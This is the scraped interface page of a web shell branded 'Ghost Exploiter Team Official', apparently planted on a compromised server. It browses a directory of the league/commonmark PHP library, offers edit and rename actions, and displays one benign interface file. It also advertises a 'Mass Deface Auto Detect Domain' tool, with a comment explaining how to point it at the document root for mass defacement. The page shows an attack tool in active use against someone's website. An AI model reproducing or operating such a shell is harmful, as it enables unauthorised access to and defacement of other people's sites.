Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
league
/
commonmark
/
src
/
Reference
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
MemoryLimitedReferenceM
...
1.595KB
edt
ren
Reference.php
1.131KB
edt
ren
ReferenceInterface.php
0.608KB
edt
ren
ReferenceMap.php
1.975KB
edt
ren
ReferenceMapInterface.php
0.769KB
edt
ren
ReferenceParser.php
9.021KB
edt
ren
ReferenceableInterface.php
0.396KB
edt
ren
<?php declare(strict_types=1); /* * This file is part of the league/commonmark package. * * (c) Colin O'Dell <colinodell@gmail.com> * * Original code based on the CommonMark JS reference parser (https://bitly.com/commonmark-js) * - (c) John MacFarlane * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace League\CommonMark\Reference; /** * Link reference */ interface ReferenceInterface { public function getLabel(): string; public function getDestination(): string; public function getTitle(): string; }
<=Back
Liking